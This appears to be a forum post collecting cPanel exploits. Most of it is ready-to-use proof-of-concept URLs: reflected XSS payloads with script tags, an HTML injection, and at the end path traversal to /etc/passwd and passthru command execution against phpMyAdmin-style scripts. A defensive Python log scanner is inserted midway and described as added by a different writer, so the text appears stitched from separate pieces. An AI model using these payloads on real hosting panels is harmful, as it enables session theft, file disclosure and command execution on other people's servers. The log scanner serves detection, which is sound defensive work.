Today's mini-review of vulnerabilities is devoted to cPanel.
I hope you will find it interesting and useful.
Exploits:
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
exploit for Cpanel 5 remote command execution
local cPanel <= 10.8.x cpwrap root exploit via mysqladmin
BasiliX <= 1.1.1 Remote File Include Exploit
exploit for Cpanel 5 remote command execution
Multiple XSS cPanel 10
cPanel 11 Multiple Cross-Site Scripting
Code:
http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS
http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS
http://target:2082/frontend/x/files/createdir.html?dir=XSS
http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss
http://target:2082/frontend/x/err/erredit.html?dir=XSS
http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS
http://target:2082/frontend/x/files/createfile.html?dir=XSS
Extensive cPanel Cross Site Scripting
Code:
Systems Affected: cPanel 9.1.0-R85
To check cPanel for cross-site scripting (called CSS in the original advisory), simply access the following example URLs in a browser:
http://[victim]/frontend/x/cpanelpro/ignorelist.html?account="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x/sql/repairdb.html?db=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x/ftp/doaddftp.html?login="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/cpanelpro/editmsg.html?account="><script>alert('Vulnerable')</script>
http://[victim]/frontend/x/testfile.html?email=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/err/erredit.html?dir=public_html/&file=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.cirt.net/'</script>
http://[victim]/frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script>
http://[victim]/frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script>
References:
Updated information can be found on OSVDB.org under the following entries:
http://www.osvdb.org/4208 cPanel testfile.html email Variable XSS
http://www.osvdb.org/4209 cPanel erredit.html file Variable XSS
http://www.osvdb.org/4210 cPanel dnslook.html dns Variable XSS
http://www.osvdb.org/4211 cPanel ignorelist.html account Variable XSS
http://www.osvdb.org/4212 cPanel showlog.html account Variable XSS
http://www.osvdb.org/4213 cPanel repairdb.html db Variable XSS
http://www.osvdb.org/4214 cPanel doaddftp.html login Variable XSS
http://www.osvdb.org/4215 cPanel editmsg.html account Variable XSS
http://www.osvdb.org/4243 cPanel del.html account Variable XSS
cPanel 10.9.1 XSS
Code:
cPanel 10.9.1 XSS
/frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERE
(click on Go Back...)
XSS in Cpanel 10
Code:
Exploit & Examples:
Exploit:
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1>
Javascript:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">
Server Side Inclusion:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->
HTML:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">
cPanel Version 11 Pops.Html Cross-Site Scripting
Code:
http://target:2082/mail/pops.html?domain=XSS
cPanel Multiple Cross Site Scripting Vulnerability
Code:
Affected scripts with proof of concept exploit:
http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.html?email= <script>alert('vul')</script>&domain=
http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.html?email= <script>alert('vul')</script>&domain=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.html?showtree=0 "><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script>
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xxx&target=xxx
http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.html?mon=Jan "><script>alert('vul')</script>&year=2006&domain=xxx&target=xxx
cPanel 10 Multiple Cross Site Scripting
Code:
cPanel File Manager:
PoC:
http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS]
cPanel Password Protect DIRS:
PoC:
http://target.com:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&pass=&dir=A VALID FOLDER
*Press Go Back (hyperlink)
In Password Protected DIR:
PoC:
http://www.target:2082/frontend/[servername]/htaccess/newuser.html?user=[XSS]&pass=&dir=[XSS]
Major cPanel Exploit HTML Injection
Code:
http://(domain):2086/scripts/passwd?password=<>&domain=<>&user=<>
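As an added defender-side example (my code, not part of the original post and not cPanel's own), the following Python script scans Apache-style access log lines for reflected-XSS probes against the cPanel/WHM scripts and parameters named in the XSS sections above; the watched script/parameter table is assembled from those entries, and the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# cPanel/WHM scripts and the query parameters the advisories above report as
# reflected without encoding (script and parameter names taken from this page).
WATCHED_PARAMS = {
    "ignorelist.html": {"account"}, "showlog.html": {"account"}, "editmsg.html": {"account"},
    "repairdb.html": {"db"}, "doaddftp.html": {"login"}, "testfile.html": {"email"},
    "erredit.html": {"dir", "file"}, "dnslook.html": {"dns"}, "del.html": {"ip", "account"},
    "select.html": {"dir", "file"}, "seldir.html": {"dir"}, "newuser.html": {"user", "dir"},
    "pops.html": {"domain"}, "editquota.html": {"email"}, "dodelpop.html": {"email"},
    "changepro.html": {"resname"}, "passwd": {"password", "domain", "user"},
}
# Markup that has no business inside an account, path, e-mail or domain parameter.
XSS_MARKERS = re.compile(r"<\s*/?\s*(script|img|iframe|h1|b|pre)\b|javascript:|<!--#", re.I)
# Apache combined-log prefix: client, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})')
def inspect_request(path_and_query):
    """Return (script, param, decoded value) for a suspicious request, else None."""
    parts = urlsplit(path_and_query)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in WATCHED_PARAMS:
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        decoded = unquote_plus(value)  # parse_qsl decoded once; this catches double-encoding
        if name in WATCHED_PARAMS[script] and XSS_MARKERS.search(decoded):
            return script, name, decoded
    return None

def scan_log(text):
    """Return a list of (client, script, param, value) for each suspicious log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (found := inspect_request(m["url"])):
            hits.append((m["ip"],) + found)
    return hits

# Constructed sample log lines (not real traffic); RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2007:12:00:01 +0000] "GET /frontend/x/cpanelpro/showlog.html?account=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 512
203.0.113.7 - - [10/Jan/2007:12:00:02 +0000] "GET /frontend/x/sql/repairdb.html?db=mydb HTTP/1.1" 200 210
198.51.100.4 - - [10/Jan/2007:12:00:05 +0000] "GET /frontend/x/files/select.html?dir=/&file=%3CIMG%20src=%22javascript:alert(1)%22%3E HTTP/1.1" 200 780
198.51.100.4 - - [10/Jan/2007:12:00:06 +0000] "GET /mail/pops.html?domain=example.com HTTP/1.1" 200 300
"""
if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("client %s probed %s parameter %r with %r" % hit)
```

Only the two lines carrying markup in a watched parameter are reported; the plain `db=mydb` and `domain=example.com` requests to the same scripts pass through.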
Includes:
Code:
./tbl_replace.php?db=test&table=test&goto=/etc/hosts
./sql.php?goto=/etc/hosts&btnDrop=No
./export.php?what=../../../../../../etc/passwd%00
Arbitrary command execution:
Code:
./tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
./tbl_copy.php?db=test&table=test&new_name=test.test2&strCopyTableOK="".passthru('/bin/ls')."""
Path disclosure:
Code:
./libraries/grab_globals.lib.php